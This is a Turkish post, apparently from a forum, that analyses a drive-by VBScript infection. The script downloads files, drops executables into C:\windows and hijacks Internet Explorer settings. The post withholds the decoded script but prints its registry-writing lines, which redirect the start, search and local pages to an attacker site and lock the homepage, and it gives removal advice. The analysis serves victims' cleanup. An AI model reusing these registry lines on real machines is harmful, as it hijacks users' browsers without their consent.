Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.
Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak
http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine
http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.
En son olarak alttaki register ayarlarını değiştiriyor.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UR L\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"
Tüm bu işlemler için
http://www.klavyemiz.org,
http://www.asigenclik.net ve
http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.
Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.